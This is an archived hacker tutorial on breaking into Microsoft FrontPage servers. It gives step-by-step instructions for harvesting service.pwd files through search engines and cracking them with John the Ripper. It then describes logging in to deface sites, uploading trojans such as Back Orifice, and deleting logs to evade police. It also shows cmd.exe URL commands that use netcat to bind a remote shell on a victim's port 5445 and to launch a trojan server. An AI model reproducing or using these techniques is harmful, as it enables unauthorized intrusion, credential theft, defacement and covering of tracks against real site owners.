TUCoPS :: Web :: IIS :: hfge2.txt

Hacking FrontPage at a Glance

Hacking FrontPage at a Glance

By Aicra from Cekurity In Progress.
 Ver. 2 English.


The second edition of Hacking FrontPage at a Glance is now finished and I hope you will enjoy it. If you doubt anything, please email me. When you have read this paper, you should be able to hack a FrontPage Server yourself - if not read it again. I wrote it from my own experience with FPSE (FrontPage Server Extensions), which I think will give you a good understanding of what FPSE really are.
If you have no experience with hacking, do not worry the text is written in a newbie-kind-of-language.  
Have fun!

So what is Microsoft FrontPage Server Extensions?

Officially it is a webserver hosting webpages. It does so on port 80 as you might already know.  
It has a nice graphically user interface (GUI), which makes it easy to create webpages in no time. 
Unofficially it's a webserver with a serious backdoor letting you hack it very easy - more about that later.
Microsoft bought people at Vermeer Technology Inc., VTI, to help them programme FrontPage. In my point of view VTI did a lousy job. If VTI made the backdoor  with purpose to make Microsoft Products look even more bad (go VTI) than they already do, I don't know, but that's sure a cool thing to do againts monopolists! 


·	The Microsoft Frontpage software with Server Extensions installed.
·	A password cracking program like John the Ripper by Solar Designer. 
·	An internet connection of course.
·	Your own nice I've-hacked-this-homepage to upload.
·	A trojan horse if you like. 


Learn something about the OS´ that FPSE run on especially where the logfiles are if any. Why? 
Could you imagine the cops knocking at your front door some day, just because you didn't know where the log file were. 
- I hasn't happened to me eventhough im not always looking for logs, but you can never be to sure. 
The OS´ that FPSE runs on include UNIX, Windows 95, Windows 98 and Windows NT.
Log files could be a CGI-script that counts visitors (and their IP) coming to their webpage, it could a FTP-server keeping track of downloaded files and so on. Be sure to delete such things! 

Hacking FrontPage at a Glance

When logging onto a FrontPage Server (FPS), it prompts for an Username and a Password,  - a little security feature preventing unauthorised personel in receiving access to the server. The FPS stores the Username and Passwprd in a file often called service.pwd. Why do I say often? Earliere versions of FPS, from vers. 2.0 and below I think, didn't have a file called service.pwd, but three other files called administrators.pwd, authors.pwd and users.pwd. Service.pwd will reside in a directory called _vti_pvt. (Go ahead and find it on your own computer).

When you find it, open service.pwd in a texteditor like Notepad or Write. Then you'll probably see something like this*:


*) If you can't find service.pwd file in the _vti_pvt folder, its because you haven't create a Web yet in FP. Do so before looking for the file! 

Anyway, Johndoe is the Username and lwCa29nm.xv is the Password. The Password has been encrypted, so that you can't see the real one. The encryption method is called Standard DES, which is fairly easy to crack with a password cracker like John the Ripper (JtR). In the Software section at my homepage you can download the latest JtR.
So far you know what file to to look for, where it resides, how a DES encrypted password file look a like, so now its time to begin your attack. 

·	Launch you Internet connection and go to your favourite search engine. Eg. AltaVista, HotBot or SavvySearch.
·	Type link:service.pwd in the Search field at AltaVista and hit the Search button. At HotBot or SavvySearch simply type service.pwd.
·	If you aren't getting any results try service.pwd without the link: 
At AltaVista, try .pwd (dot pwd) or try with administrators.pwd and so on. Be imaginative.
·	If you are unlucky try url:/_vti_pvt/ or url:_vti_pvt. This one works about 85 per cent of the time, because that's where the pwd reside. Anyway if you try to access the /_vti_pvt/ dir, your browser may or may not give a respond like this:

You are not authorised to view this page
You might not have permission to view this directory or page using the credentials you supplied.

A solution to that little problem could be:

It looks like this:


Change it to this instead:


You will often be able to retrieve the encrypted password file that way.
Follow the hyperlinks that the Search engines give you and download the password file or just the plain text to your harddisc. Remember the URL, i.e. www.microsoft.com or the IP address, i.e.

When you think you´ve got enough service.pwd's break your Internet connection and shut down you browser, because now its time to crack the password. 
I recommend that you use John the Ripper since its fast and easy to use. Anyway if you don't know how to use JtR, read the guide followed with the program. Here's what I normally would do if cracking a Standard DES encrypted password file:

I would start with this command in the JtR:

john -single c:\mypasswordfile.pwd	; This command tries to crack the encryption (the Password) with the Username.

If this command doesn't crack the password (which in most cases not), I would try with some rules (read the texts shipped with JtR for more info) or issue this command:

john -i c:\mypasswordfile.pwd	; This command would do something called Increasing, meaning it would try to crack with all possible characters/combinations (if I recall) starting from a to z, then ab to z and so on.

This command is a bit time consumming, but in most cases you'll get your Password cracked. Imagine a Password like: ZZ#S)2:-_!#S<=: (not encrypted yet), that would take REAL long time to crack.

Lets say you have cracked the Password, you're now able to gain access to the FPS. 
·	Launch you own FPS.
·	Click “Open Web” in the File menu. 
·	Type in www.myfrontpagevictim.com or the IP address of the victims server.
·	Click “OK” and wait...
·	*1) Type in the Username and Password.
·	Click “OK” and wait...
·	Voila: Access Granted!
o	You could now upload your own I´ve-hacked-this-server-homepage.html
o	Snaff some other passwords (if any). 
o	*2) Upload a trojan horse.
·	Cover your tracks and the delete the log file, if any (sometimes there's no log file, but be aware).
·	I advise you not to delete anything on the FrontPage Server. Why? I think you can figure it out for yourself. (Only rename the start page at the FPS to something like: renamed_index.html)

*1)  Its likely that the FPS won't prompt for Username and Password. It depends on how the administrator of the server has set up the priviliges for users. Read the Windows NT Wardoc by Neonsurge and the Rhino9 Team for more info on NT priviliges. (You can find in the Textware section of my page).     

*2) Whenever you have gained access to the server, you could upload a trojan like Back Orifice. Why Back Orifice? Its because you can get it in both the UNIX and WINDOWS version and since FPS can run on both UNIX and WINDOWS it´s perfect. 
There's an exploit called the binary FTP exploit, but what is the binary FTP exploit? Its an exploit that would allow any hacker/intruder to run a binary file on FPS, but there is a limitation; You'll have to find a server that supports FTP anonymous writable. Then you would have to create a dir via the FTP server called _vti_bin and upload mytrojan.exe. Then issue this is URL in your browser:


Bingo, the server is served.

Qoute from The Windows NT Wardoc:

Shortly after the binary attack made its rounds, the _vti_cnf bug was found. This would allow an intruder to view all files in a certain directory. By replacing the index.html with _vti_cnf, the intruder would see all files in that directory, and possibly gain access to them. The attack is issued as follows:

Standard structure http://www.someserver.com/some_directory_structure/index.html
Attack structure   http://www.someserver.com/some_directory_structure/_vti_cnf

Qoute end:

If the FPS doesn't have the binary FTP exploit, what I can then do to run arbitrary code on FPS?
I have tried this one out a server running IIS4 (Internet Information Server4.0) with Service Pack 3 on a NT4.0 machine, if it works on other configurations let me know.

Lets attack:

·	Start op your FrontPage Explorer) --> FrontPage --> Open Web.
·	Type in Username and Password.
·	Then go to CGI-BIN and make sure it has Execute permissions.
·	Upload cmd.exe. Cmd.exe is only on NT machines so get cmd.exe from a friend if you don't run NT. I recommend you also upload nc.exe (netcat)
·	Then bind cmd.exe to a port with netcat.exe. (use ncx.exe to do this).
·	Then upload a trojan (eg. Back Orifice, Netbus…)
·	Load you webbrowser and type in the following:


This would give you a directory listings from c:\>. You could substitute “c” with “d” if you like to get a directory listing of d:\>.


Note: There has to be a d drive to accomplish that one.
·	Now continue with this command: (if you have uploaded nc.exe)

http://www.myvictim.com/cgi-bin/cmd.exe?%20/c%20[path] \inetpub\wwwroot\cgi-bin\nc.exe -L -p 5445 -e cmd.exe

Note: You could substitute port 5445 with any other port. Just make sure the server isn't using it. Example if the server is running FTP (in this case port 21) it would be stupid to assign cmd.exe to port 21. If have tried that for fun and it resulted in an error.

This would result in netcat (nc.exe) binding cmd.exe (Command Promt) to port 5445. But what does that mean? It means that you now could telnet to the victim on port 5445 and get a Command Prompt with IUSR_MACHINE accees, and do whatever you think you would do, since IUSR_MACHINE gives the Everyone group Administrator access to FrontPage webs. Well if want to use Back Orifice instead of telnetting to port 5445 you would issue the following command(URL) in you browser:

http://www.company.com/cgi-bin/cmd.exe?%20/c%20[path] \inetpub\wwwroot\cgi-bin\boserve.exe

Last words:

This will be the last Hacking FrontPage a Glance paper I'll do, but if you have corrections, suggestions or questions to this paper, email me and I'll see what I can do. Well, I hope that you've have enjoyed it and think this paper wasn't a waste of time.
Be sure to read some of the other papers that I have wrote.

Linx used in the paper


AltaVista					www.altavista.com
HotBot					www.hotbot.com
SavvySearch					www.savvysearch.com
John the Ripper				At my homepage in the Software 						section.
Ncx.exe/nc.exe/bo				In the software section.
Aicra - Cekurity In Progress		aicra@yale.cadet.net
Homepage					http://cip.subnet.dk 


Ó All rights reserved [Cekurity In Progress].

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH